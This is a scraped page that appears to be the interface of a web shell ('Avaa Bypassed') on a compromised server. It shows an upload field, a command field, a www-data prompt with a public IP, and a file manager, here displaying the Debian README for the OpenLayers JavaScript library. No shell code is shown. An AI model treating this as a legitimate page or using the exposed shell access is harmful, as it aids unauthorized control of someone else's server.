[ Avaa Bypassed ]




Upload:

Command:

www-data@18.119.129.134: ~ $
OpenLayers for Debian
---------------------

If you wish to include OpenLayers in your HTML files which are served
via a webserver you should add the following lines to your <HEAD>
section:

    <script language="javascript" type="text/javascript"
        src="/javascript/openlayers/OpenLayers.js"></script>
        
If you're generating files which are going to be served via the
filesystem (such that no HTTP server is used) instead you should
access OpenLayers via the filesystem path:

    <script language="javascript" type="text/javascript"
        src="/usr/share/javascript/openlayers/OpenLayers.js"></script>

OpenLayers.js is full and uncompressed OpenLayers javascript, the minified
variant is OpenLayers.min.js.

The following variants of OpenLayers are available:

 Profile  Uncompressed          Minified
 -------------------------------------------------------
 full     OpenLayers.js         OpenLayers.min.js
 light    OpenLayers.light.js   OpenLayers.light.min.js
 lite     OpenLayers.lite.js    OpenLayers.lite.min.js
 mobile   OpenLayers.mobile.js  OpenLayers.mobile.min.js
 tests    OpenLayers.tests.js   OpenLayers.tests.min.js


Filemanager

Name Type Size Permission Actions
README.Debian File 1.13 KB 0644
changelog.Debian.gz File 1.5 KB 0644
copyright File 42.58 KB 0644
readme.md File 3.33 KB 0644